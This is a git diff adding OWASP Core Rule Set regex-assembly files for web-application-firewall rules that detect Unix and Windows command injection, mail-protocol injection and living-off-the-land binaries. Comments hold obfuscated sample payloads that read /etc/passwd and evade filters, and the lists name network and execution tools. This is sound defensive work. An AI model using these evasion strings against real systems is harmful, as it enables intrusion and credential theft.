+ ##!> cmdline windows
+
+ ac@
+ asnp@
+ cd@
+ ##! disabled for FP: cat@
+ chdir@
+ clc@
+ ##! disabled for FP: clear
+ clhy@
+ cli@
+ clp@
+ cls
+ clv@
+ cnsn
+ ##! 
disabled for FP: compare@
+ ##! disabled for FP: copy@
+ cp@
+ cpi@
+ cpp@
+ cvpa@
+ dbp@
+ del@
+ diff@
+ dir@
+ dnsn
+ ebp@
+ epal@
+ epcsv@
+ epsn@
+ ##! disabled for FP: erase@
+ etsn@
+ exsn@
+ fc@
+ fl@
+ foreach@
+ ft@
+ fw@
+ gal@
+ gbp@
+ gc@
+ gci@
+ gcm@
+ gcs@
+ gdr@
+ gerr
+ ghy@
+ gi@
+ gjb@
+ gl@
+ gm@
+ gmo@
+ gp@
+ gps@
+ gpv
+ ##! disabled for FP: group
+ gsn@
+ gsnp@
+ gsv@
+ gu@
+ gv@
+ gwmi@
+ ##! disabled for FP: h
+ ##! disabled for FP: history
+ icm@
+ iex@
+ ihy@
+ ii@
+ ipal@
+ ipcsv@
+ ipmo@
+ ipsn@
+ irm@
+ ise@
+ iwmi@
+ iwr@
+ ##! disabled for FP: kill
+ ls
+ man@
+ md@
+ ##! disabled for FP: measure
+ mi@
+ mount@
+ ##! disabled for FP: move
+ mp@
+ mv@
+ nal@
+ ndr@
+ ni@
+ nmo@
+ npssc
+ nsn@
+ nv@
+ ogv@
+ ##! disabled for FP: oh
+ popd@
+ pushd@
+ ##! disabled for FP: pwd
+ ##! disabled for FP: r
+ rbp@
+ rcjb@
+ rcsn
+ rd@
+ rdr@
+ ren@
+ ri@
+ rjb@
+ rm@
+ rmdir@
+ rmo@
+ rni@
+ rnp@
+ rp@
+ rsn@
+ rsnp@
+ rujb
+ rv@
+ rvpa@
+ rwmi@
+ sajb@
+ sal@
+ saps@
+ sasv@
+ sbp@
+ sc@
+ ##! disabled for FP: select
+ ##! disabled for FP: set
+ shcm
+ si@
+ sl@
+ ##! disabled for FP: sleep
+ sls@
+ ##! disabled for FP: sort
+ sp@
+ spjb@
+ spps@
+ spsv@
+ ##! disabled for FP: start
+ sujb
+ sv@
+ swmi@
+ ##! disabled for FP: tee
+ trcm@
+ ##! disabled for FP: type
+ ##! disabled for FP: where
+ wjb@
+ ##! disabled for FP: write@
+ ##!<
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/932130.ra b/nginx/config/owasp-crs/regex-assembly/932130.ra
new file mode 100644
index 00000000..b5ac4977
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932130.ra
@@ -0,0 +1,13 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+\$\(.*\)
+\$\{.*\}
+<\(.*\)
+>\(.*\)
+\$\(\(.*\)\)
+
+##! Find wordlist bypasses using [ ] glob characters, like: /e[t]c
+##! Require a / in front to prevent false positives like [text in brackets]
+/\w*\[!.+\]
+/\w*\[.+\]
diff --git a/nginx/config/owasp-crs/regex-assembly/932140.ra b/nginx/config/owasp-crs/regex-assembly/932140.ra
new file mode 100644
index 00000000..ddab7e06
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932140.ra
@@ -0,0 +1,5 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+\bfor(?:/[dflr].*)? %+[^ ]+ in\(.*\)\s?do
+\bif(?:/i)?(?: not)?(?: exist\b| defined\b| errorlevel\b| cmdextversion\b|(?: |\().*(?:\bgeq\b|\bequ\b|\bneq\b|\bleq\b|\bgtr\b|\blss\b|==))
diff --git a/nginx/config/owasp-crs/regex-assembly/932175.ra b/nginx/config/owasp-crs/regex-assembly/932175.ra
new file mode 100644
index 00000000..afb7620e
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932175.ra
@@ -0,0 +1,27 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Prevent command aliasing
+
+##! starting tokens prefix
+##!> assemble
+ \b
+ ##!=>
+ ##!> cmdline unix
+ alias
+ ##!<
+ ##!=>
+
+ ##! match white space between command and arguments
+ \b\s+
+ ##!=>
+
+ ##! match the alias name
+ ['"\w!%,@]+
+ ##!=>
+
+ ##! match equals something
+ =\S
+ ##!=>
+
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/932200.ra b/nginx/config/owasp-crs/regex-assembly/932200.ra
new file mode 100644
index 00000000..e2dcc4d8
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932200.ra
@@ -0,0 +1,17 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! - bar;cd+/etc;/bin$u/ca*+passwd
+##! - foo;ca\t+/et\c/pa\s\swd
+##! - foo;c'at'+/etc/pa's'swd
+[*?`\x5c'][^/\n]+/
+/[^/]+?[*?`\x5c']
+##! - foo;cat$u+/etc$u/passwd
+##! - foo;c$-at+/et$-c/pas$-swd
+##! - foo;c$_at+/et$_c/pas$_swd
+##! - foo;c$?at+/et$?c/pas$?swd
+##! - foo;c$*at+/et$*c/pas$*swd
+##! - foo;c$@at+/et$@c/pas$@swd
+##! - foo;c$!at+/et$!c/pas$!swd
+##! - foo;c$$at+/et$$c/pas$$swd
+\$[({\[#@!?*\-_$a-zA-Z0-9]
diff --git a/nginx/config/owasp-crs/regex-assembly/932205.ra b/nginx/config/owasp-crs/regex-assembly/932205.ra
new file mode 100644
index 00000000..84695af3
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932205.ra
@@ -0,0 +1,29 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Prefix to prevent the first `?` (query string marker
+##! in URLs) from matching any of the later expressions.
+##! If the URL does not have a query string, then instead
+##! look for the first `;`.
+##! Prefix and suffix markers also form two capture groups
+##! that are used for processing and logging in the rule.
+##!^ ^[^.]+\.[^?;]+[?;](.*(
+##!$ ))
+
+##! The following expressions in this file must be identical to the
+##! ones in 932200.
+
+##! - bar;cd+/etc;/bin$u/ca*+passwd
+##! - foo;ca\t+/et\c/pa\s\swd
+##! - foo;c'at'+/etc/pa's'swd
+[*?`\x5c'][^/\n]+/
+/[^/]+?[*?`\x5c']
+##! - foo;cat$u+/etc$u/passwd
+##! - foo;c$-at+/et$-c/pas$-swd
+##! - foo;c$_at+/et$_c/pas$_swd
+##! - foo;c$?at+/et$?c/pas$?swd
+##! - foo;c$*at+/et$*c/pas$*swd
+##! - foo;c$@at+/et$@c/pas$@swd
+##! - foo;c$!at+/et$!c/pas$!swd
+##! - foo;c$$at+/et$$c/pas$$swd
+\$[({\[#@!?*\-_$a-zA-Z0-9]
diff --git a/nginx/config/owasp-crs/regex-assembly/932206.ra b/nginx/config/owasp-crs/regex-assembly/932206.ra
new file mode 100644
index 00000000..dce24e55
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932206.ra
@@ -0,0 +1,25 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Prefix to ensure that the rule only matches when the
+##! value of the Referer header is not a URL (illegal header
+##! value).
+##!^ ^[^.]*?
+
+##! The following expressions in this file must be identical to the
+##! ones in 932200.
+
+##! - bar;cd+/etc;/bin$u/ca*+passwd
+##! - foo;ca\t+/et\c/pa\s\swd
+##! - foo;c'at'+/etc/pa's'swd
+[*?`\x5c'][^/\n]+/
+/[^/]+?[*?`\x5c']
+##! - foo;cat$u+/etc$u/passwd
+##! - foo;c$-at+/et$-c/pas$-swd
+##! - foo;c$_at+/et$_c/pas$_swd
+##! - foo;c$?at+/et$?c/pas$?swd
+##! - foo;c$*at+/et$*c/pas$*swd
+##! - foo;c$@at+/et$@c/pas$@swd
+##! - foo;c$!at+/et$!c/pas$!swd
+##! - foo;c$$at+/et$$c/pas$$swd
+\$[({\[#@!?*\-_$a-zA-Z0-9]
diff --git a/nginx/config/owasp-crs/regex-assembly/932210.ra b/nginx/config/owasp-crs/regex-assembly/932210.ra
new file mode 100644
index 00000000..1d44a187
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932210.ra
@@ -0,0 +1,77 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This list can be updated using:
+##! curl -ks https://raw.githubusercontent.com/sqlite/sqlite/master/src/shell.c.in | grep -oE '^\s+"(\.[a-z0-9]+)' | cut -f2 -d.
+
+##!^ ;\s*\.\s*[\"']?
+
+archive
+auth
+backup
+bail
+binary
+cd
+changes
+check
+clone
+connection
+databases
+dbconfig
+dbinfo
+dump
+echo
+eqp
+excel
+exit
+expert
+explain
+filectrl
+fullschema
+headers
+help
+import
+imposter
+indexes
+iotrace
+limit
+lint
+load
+log
+mode
+nonce
+nullvalue
+once
+open
+output
+parameter
+print
+progress
+prompt
+quit
+read
+recover
+restore
+save
+scanstats
+schema
+selftest
+separator
+session
+sh
+sha3sum
+shell
+show
+stats
+system
+tables
+testcase
+testctrl
+timeout
+timer
+trace
+unmodule
+vfsinfo
+vfslist
+vfsname
+width
diff --git a/nginx/config/owasp-crs/regex-assembly/932220.ra b/nginx/config/owasp-crs/regex-assembly/932220.ra
new file mode 100644
index 00000000..c2bc6307
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932220.ra
@@ -0,0 +1,25 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Word list for rule 932220 (RCE Unix command injection)
+##!
+##! This list comes from (and should be in sync) the `unix-shell.data` file.
+
+##! Not all of the prefixes for the command words will be legal.
+##! We've decided to use the same prefix as in 932100 and 932105 here,
+##! because we don't know exactly what things are possible after a pipe and
+##! we don't want to overcomplicate things by introducing another prefix variation.
+##! Not all of the prefixes matched by the expression will actually be valid.
+
+##!+ i
+
+##!^ .\|
+
+##!> assemble
+ \s*
+ ##!> include unix-shell-evasion-prefix
+
+ ##!> cmdline unix
+ ##!> include-except unix-shell-upto3 unix-shell-fps-pl2 -- @ "" ~ ""
+ ##!<
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/932230.ra b/nginx/config/owasp-crs/regex-assembly/932230.ra
new file mode 100644
index 00000000..7b298ea6
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932230.ra
@@ -0,0 +1,21 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Word list for rule 932230 (RCE for commands of two and three character words)
+##!
+##! Per discussion in https://github.com/coreruleset/coreruleset/issues/2632, we decided
+##! to extend the cmdline evasion regex, so we are applying the evasion to a subset of the
+##! original 93210(0|5) rules: the subset of commands from two or three characters that might pose
+##! a greater risk of false positives.
+
+##!+ i
+
+##!$ \b
+
+##!> assemble
+ ##!> include unix-shell-evasion-prefix
+
+ ##!> cmdline unix
+ ##!> include-except unix-shell-upto3 unix-shell-fps-pl1
+ ##!<
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/932231.ra b/nginx/config/owasp-crs/regex-assembly/932231.ra
new file mode 100644
index 00000000..22b5e8b8
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932231.ra
@@ -0,0 +1,21 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Word list for rule 932231 (RCE Unix command injection part 3/4)
+##!
+##! To prevent some FP for a command, you can require command parameters
+##! after a command. Only do this if the command regularly causes FP and if
+##! allowing the bare command (without parameters) is not too dangerous.
+##! (Note: due to \b following the regexp, a word boundary is also required
+##! further on, so some letter/number is needed for a match). Example:
+##!
+##! diff+
+
+##! Special regexp case for the '.' (source) command to prevent FP:
+
+
+##!> assemble
+ ##!> include unix-shell-evasion-prefix
+
+ \.\s.*\b
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/932232.ra b/nginx/config/owasp-crs/regex-assembly/932232.ra
new file mode 100644
index 00000000..50af9d01
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932232.ra
@@ -0,0 +1,16 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Word list for rule 932232 (RCE Unix command injection part 4/4)
+
+##!$ \b
+
+##!> assemble
+ ##!> include unix-shell-evasion-prefix
+
+ ##!> assemble
+ ##!> cmdline unix
+ ##!> include unix-shell-pl3
+ ##!<
+ ##!<
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/932235.ra b/nginx/config/owasp-crs/regex-assembly/932235.ra
new file mode 100644
index 00000000..0cc7ae30
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932235.ra
@@ -0,0 +1,11 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> include unix-shell-evasion-prefix
+
+##! These patterns are approximations of the patterns used by the cmdline
+##! processor for `@` and `~`.
+##! These patterns are used across multiple files, change with care.
+##!> include unix-shell-4andup -- @ [\s<>&|)] ~ \S
diff --git a/nginx/config/owasp-crs/regex-assembly/932236.ra b/nginx/config/owasp-crs/regex-assembly/932236.ra
new file mode 100644
index 00000000..a456d1d1
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932236.ra
@@ -0,0 +1,21 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> assemble
+ ##!> assemble
+ ##!> include unix-shell-evasion-prefix-start-of-string
+ ##!<
+
+ ##!> assemble
+ ##!> include unix-shell-evasion-prefix
+ ##!<
+##!<
+##!=>
+
+##! These patterns are approximations of the patterns used by the cmdline
+##! processor for `@` and `~`.
+##! These patterns are used across multiple files, change with care.
+##!> include-except unix-shell-upto3 unix-shell-fps-pl2 -- @ [\s<>&|)] ~ \S
+##!> include-except unix-shell-4andup unix-shell-fps-pl2 -- @ [\s<>&|)] ~ \S
diff --git a/nginx/config/owasp-crs/regex-assembly/932237.ra b/nginx/config/owasp-crs/regex-assembly/932237.ra
new file mode 100644
index 00000000..db57f72d
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932237.ra
@@ -0,0 +1,15 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!^ \b
+
+##!$ (?:\b|\W)
+
+##! These patterns are approximations of the patterns used by the cmdline
+##! processor for `@` and `~`.
+##! These patterns are used across multiple files, change with care.
+##!> include-except unix-shell-upto3 unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S
+##!> include-except unix-shell-4andup unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S
+##!> include-except unix-shell-pl3 unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S
diff --git a/nginx/config/owasp-crs/regex-assembly/932238.ra b/nginx/config/owasp-crs/regex-assembly/932238.ra
new file mode 100644
index 00000000..b006066c
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932238.ra
@@ -0,0 +1,21 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> assemble
+ ##!> assemble
+ ##!> include unix-shell-evasion-prefix-start-of-string
+ ##!<
+
+ ##!> assemble
+ ##!> include unix-shell-evasion-prefix
+ ##!<
+##!<
+##!=>
+
+##!> assemble
+ ##!> cmdline unix
+ ##!> include unix-shell-pl3
+ ##!<
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/932239.ra b/nginx/config/owasp-crs/regex-assembly/932239.ra
new file mode 100644
index 00000000..bc4985cb
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932239.ra
@@ -0,0 +1,21 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> assemble
+ ##!> assemble
+ ##!> include unix-shell-evasion-prefix-start-of-string
+ ##!<
+
+ ##!> assemble
+ ##!> include unix-shell-evasion-prefix
+ ##!<
+##!<
+##!=>
+
+##! These patterns are approximations of the patterns used by the cmdline
+##! processor for `@` and `~`.
+##! These patterns are used across multiple files, change with care.
+##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S
+##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S
diff --git a/nginx/config/owasp-crs/regex-assembly/932240.ra b/nginx/config/owasp-crs/regex-assembly/932240.ra
new file mode 100644
index 00000000..7f56f2ff
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932240.ra
@@ -0,0 +1,33 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Rule 932240 (Generic RCE Unix command evasion detection)
+##!
+##! Conceptually, we want to match:
+##! - at least one character
+##! - at least one character from an evasion technique
+
+##!+ i
+
+##! The previous cmdline evasion detection was based on the one from modsecurity: `[\x5c'\"]*`
+##! We extended the evasion detection from the cmdline processor with `(?:\$[a-z0-9_@?!#{*-]*)?(?:\x5c)?` to match:
+##! - non-existing vars: cu$@rl, una$$me -a, uname$$u -a
+##! - vars + spacing: v='u';cu$v\r\l google.com
+##! - globbing pattern expansion: {n$u\c$u,-nlvp,777}
+##! - globbing: garb=cur[l];$garb+google.com
+
+##!> assemble
+ [a-z0-9_-]+
+ ##!=>
+ [\x5c'\"\[\]]+
+ \$+[\x5ca-z0-9_@?!#{*-]+
+ ##! process substitution
+ ``
+ \$\(\)
+ <\(\)
+ >\(\)
+ ##!=>
+
+ \s*[a-z0-9_-]+
+ ##!=>
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/932250.ra b/nginx/config/owasp-crs/regex-assembly/932250.ra
new file mode 100644
index 00000000..da48fa62
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932250.ra
@@ -0,0 +1,21 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Word list for rule 932250 (RCE Unix command injection)
+
+##!+ i
+
+##!> assemble
+ ##!> include unix-shell-evasion-prefix-start-of-string
+
+ ##!> assemble
+ ##!> cmdline unix
+ ##!> include-except unix-shell-upto3 unix-shell-fps-pl1 -- @ "" ~ ""
+ ##!<
+ ##!=>
+ ##! This pattern is an approximation of the pattern used by the cmdline
+ ##! processor for `@`.
+ ##! This pattern is used across multiple files, change with care.
+ [\s<>&|)]
+ ##!<
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/932260.ra b/nginx/config/owasp-crs/regex-assembly/932260.ra
new file mode 100644
index 00000000..d94b7912
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932260.ra
@@ -0,0 +1,15 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Word list for rule 932260 (RCE Unix command injection)
+
+##!+ i
+
+##!> assemble
+ ##!> include unix-shell-evasion-prefix-start-of-string
+
+ ##! These patterns are approximations of the patterns used by the cmdline
+ ##! processor for `@` and `~`.
+ ##! These patterns are used across multiple files, change with care.
+ ##!> include-except unix-shell-4andup unix-shell-fps-pl1 -- @ [\s<>&|)] ~ \S
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/932300.ra b/nginx/config/owasp-crs/regex-assembly/932300.ra
new file mode 100644
index 00000000..9477717f
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932300.ra
@@ -0,0 +1,18 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!^ (?is)\r\n.*?\b
+
+##! - SMTP Commands
+EHLO [a-zA-Z-\.]{1,255}
+HELO [a-zA-Z-\.]{1,255}
+MAIL FROM:<.{1,64}@.{1,255}>
+RCPT TO:(?:<.{1,64}@.{1,255}>|(?: ))?<.{1,64}>
+VRFY (?:.{1,64} <.{1,64}@.{1,255}>|.{1,64}@.{1,255})
+EXPN (?:.{1,64})
+AUTH [A-Z0-9-_]{1,20} (?:=|(?:[\w+/]{4})*(?:[\w+/]{2}==|[\w+/]{3}=))
+
+##! - SMTP Commands without params
+STARTTLS\b
+RSET\b
+NOOP\b(?: .{1,255})?
diff --git a/nginx/config/owasp-crs/regex-assembly/932301.ra b/nginx/config/owasp-crs/regex-assembly/932301.ra
new file mode 100644
index 00000000..a19c80cc
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932301.ra
@@ -0,0 +1,13 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!^ (?s)\r\n.*?\b
+
+##! - SMTP Commands without or optional params
+DATA
+QUIT
+HELP(?: .{1,255})?
+
+##! - SMTP Commands with params
+
+##! Not covered - X Command (client extensions)
diff --git a/nginx/config/owasp-crs/regex-assembly/932310.ra b/nginx/config/owasp-crs/regex-assembly/932310.ra
new file mode 100644
index 00000000..0aaeadcc
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932310.ra
@@ -0,0 +1,22 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! All IMAP4 commands start with a "tag"
+
+##!+ is
+##!^ \r\n\w{1,50}\b[ ]
+
+##! IMAP4 Commands - PL2
+
+##! - IMAP4Rev1 Commands - with params
+APPEND (?:[\w\"\.\-\x5c\/%\*&#]+)?(?: \((?:[a-z\x5c\ ])+\))?(?: \"?\d{1,2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2} [+-]\d{4}\"?)? \{\d{1,20}\+?\}
+AUTHENTICATE [a-z0-9-_]{1,20}\r\n
+LSUB (?:[\w\"~\/\*#\.]+)? (?:[\w\"\.\x5c\/%\*&]+)?
+STATUS (?:[\w\"\.\-\x5c\/%\*&]+)? \((?:UNSEEN|UIDNEXT|MESSAGES|UIDVALIDITY|RECENT| )+\)
+UID (?:COPY|FETCH|STORE) (?:[0-9,:\*]+)?
+##! - IMAP4Rev1 Commands Extensions - with params
+DELETEACL (?:[\w\"\.\-\x5c\/%\*&]+)?
+GETACL (?:[\w\"\.\-\x5c\/%\*&]+)?
+MYRIGHTS (?:[\w\"\.\-\x5c\/%\*&]+)?
+LISTRIGHTS (?:[\w\"\.\-\x5c\/%\*&]+)?
+SETACL (?:[\w\"\.\-\x5c\/%\*&]+)? [+-][lrswipckdxtea]+?
diff --git a/nginx/config/owasp-crs/regex-assembly/932311.ra b/nginx/config/owasp-crs/regex-assembly/932311.ra
new file mode 100644
index 00000000..d1d76f4f
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932311.ra
@@ -0,0 +1,44 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! All IMAP4 commands start with a "tag"
+
+##! TDB: representing charset and language (if needed)
+##!+ is
+##!^ \r\n\w{1,50}\b[ ]
+
+##! - IMAP4 Commands - PL3
+
+##! - IMAP4Rev1 Commands - with params
+CREATE [\w\"\.\-\x5c\/%\*&#]+
+COPY [0-9,:\*]+ [\w\"\.\-\x5c\/%\*&#]+
+DELETE [\w\"\.\-\x5c%\*&#]+
+EXAMINE [\w\"\.\-\x5c%\*&#]+
+FETCH [0-9,:\*]+
+LIST [\w\"~\-\x5c\/\*#\.]+? [\w\"\.\-\x5c\/%\*&#]+
+LOGIN [a-z0-9-_\.\@]{1,40} .*?
+RENAME [\w\"\.\-\x5c\/%\*&#]+? [\w\"\.\-\x5c\/%\*&#]+
+SELECT [\w\"\.\-\x5c\/%\*&#]+
+STORE [0-9,:\*]+? [+-]?FLAGS(?:\.SILENT)? (?:\(\x5c[a-z]{1,20}\))?
+SUBSCRIBE [\w\"\.\-\x5c\/%\*&#]+
+UNSUBSCRIBE [\w\"\.\-\x5c\/%\*&#]+
+##! Search has plenty of variants
+SEARCH(?: CHARSET [\w\-_\.]{1,40})? (KEYWORD \x5c)?(?:ALL|ANSWERED|BCC|DELETED|DRAFT|FLAGGED|RECENT|SEEN|UNANSWERED|UNDELETED|UNDRAFT|UNFLAGGED|UNSEEN|NEW|OLD)
+SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:BODY|CC|FROM) .{1,255}
+SEARCH(?: CHARSET [\w\-_\.]{1,40})? HEADER .{1,100} .{1,255}
+SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:LARGER \d{1,20}|NOT .{1,255}|[0-9,:\*]+)
+SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:BEFORE|ON|SENTBEFORE|SENTON|SENTSINCE|SINCE) \"?\d{1,2}-\w{3}-\d{4}\"?
+SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:OR .{1,255} .{1,255}|SMALLER \d{1,20}|SUBJECT .{1,255})
+SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:TEXT .{1,255}|TO .{1,255}|UID [0-9,:\*]+?|UNKEYWORD (?:\x5c(Seen|Answered|Flagged|Deleted|Draft|Recent)))
+
+##! - IMAP4rev1 Commands - without params
+CAPABILITY
+CHECK
+CLOSE
+EXPUNGE
+LOGOUT
+NOOP
+STARTTLS
+UNAUTHENTICATE
+
+##! Not covered - X Command (client extensions)
diff --git a/nginx/config/owasp-crs/regex-assembly/932320.ra b/nginx/config/owasp-crs/regex-assembly/932320.ra
new file mode 100644
index 00000000..b10c953c
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932320.ra
@@ -0,0 +1,18 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! POP3 Commands - PL2
+
+##!+ is
+##!^ \r\n.*?\b
+
+##! POP3 Commands - with args
+LIST(?: \d+)?
+USER .+?
+PASS .+?
+RETR \d+?
+DELE \d+?
+UIDL(?: \d+)?
+APOP [\w]+ [a-f0-9]{32}
+TOP \d+(?: \d+)?
+AUTH [A-Z0-9-_]{1,20} (?:=|(?:[\w+/]{4})*(?:[\w+/]{2}==|[\w+/]{3}=))
diff --git a/nginx/config/owasp-crs/regex-assembly/932321.ra b/nginx/config/owasp-crs/regex-assembly/932321.ra
new file mode 100644
index 00000000..8389557b
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932321.ra
@@ -0,0 +1,13 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!^ (?si)\r\n.*?\b
+
+##! POP3 Commands - PL3
+
+##! POP3 Commands - No args
+QUIT
+STAT
+NOOP
+RSET
+CAPA
diff --git a/nginx/config/owasp-crs/regex-assembly/932370.ra b/nginx/config/owasp-crs/regex-assembly/932370.ra
new file mode 100644
index 00000000..1a0289a1
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932370.ra
@@ -0,0 +1,206 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Word list for rule 932370 (RCE Windows command injection part 1/2)
+##!
+##! The list comes from the project LOLBAS. You can get it using the following one-liner:
+##! `curl -s -H "Accept: application/vnd.github.v3+json" https://api.github.com/repos/LOLBAS-Project/LOLBAS/git/trees/master\?recursive\=1 | jq -r '.tree[].path ' | grep ^yml/ | cut -f3 -d/ | cut -f1 -d. | tr 'A-Z' 'a-z' | sort | uniq`
+##! To prevent some FP for a command, you can require command parameters
+##! after a command. Only do this if the command regularly causes FP and if
+##! allowing the bare command (without parameters) is not too dangerous.
+##! (Note: due to \b following the regexp, a word boundary is also required
+##! further on, so some letter/number is needed for a match). Example:
+##!
+##! diff@
+
+##!+ i
+
+##! extension/switches suffix
+##! cmd.com, cmd.exe, etc.
+##!$ (?:\.[\"\^]*\w+)?
+##! cmd/h
+##!$ \b
+
+##! 
starting tokens prefix
+##!> assemble
+ ##!> include windows-commands-prefix
+
+ ##!> cmdline windows
+
+ acccheckconsole
+ adplus
+ advpack
+ agentexecutor
+ appinstaller
+ appvlp
+ aspnet_compiler
+ at@
+ atbroker
+ bash
+ bginfo
+ bitsadmin
+ cdb
+ certoc
+ certreq
+ certutil
+ cl_invocation
+ cl_loadassembly
+ cl_mutexverifiers
+ cmd
+ cmdkey
+ cmdl32
+ cmstp
+ comsvcs
+ configsecuritypolicy
+ conhost
+ control
+ coregen
+ createdump
+ csc
+ cscript
+ csi
+ customshellhost
+ datasvcutil
+ defaultpack
+ desk
+ desktopimgdownldr
+ devicecredentialdeployment
+ devtoolslauncher
+ dfshim
+ dfsvc
+ diantz
+ diskshadow
+ dnscmd
+ dnx
+ dotnet
+ dump64
+ dxcap
+ esentutl
+ eventvwr
+ excel
+ expand
+ explorer
+ extexport
+ extrac32
+ findstr
+ finger
+ fltmc
+ forfiles
+ fsi
+ fsianycpu
+ fsutil
+ ftp
+ gfxdownloadwrapper
+ gpscript
+ hh
+ ie4uinit
+ ieadvpack
+ ieexec
+ ieframe
+ ilasm
+ imewdbld
+ infdefaultinstall
+ installutil
+ jsc
+ launch-vsdevshell
+ ldifde
+ makecab
+ manage-bde
+ mavinject
+ mftrace
+ microsoft
+ mmc
+ mpcmdrun
+ msbuild
+ msconfig
+ msdeploy
+ msdt
+ mshta
+ mshtml
+ msiexec
+ msohtmed
+ mspub
+ msxsl
+ netsh
+ ntdsutil
+ odbcconf
+ offlinescannershell
+ onedrivestandaloneupdater
+ openconsole
+ pcalua
+ pcwrun
+ pcwutl
+ pester
+ pktmon
+ pnputil
+ powerpnt
+ presentationhost
+ print
+ printbrm
+ procdump
+ protocolhandler
+ psr
+ pubprn
+ rasautou
+ rcsi
+ rdrleakdiag
+ reg
+ regasm
+ regedit
+ regini
+ register-cimprovider
+ regsvcs
+ regsvr32
+ remote
+ replace
+ rpcping
+ rundll32
+ runexehelper
+ runonce
+ runscripthelper
+ sc@
+ schtasks
+ scriptrunner
+ setres
+ settingsynchost
+ setupapi
+ shdocvw
+ shell32
+ sqldumper
+ sqlps
+ sqltoolsps
+ squirrel
+ ssh
+ stordiag
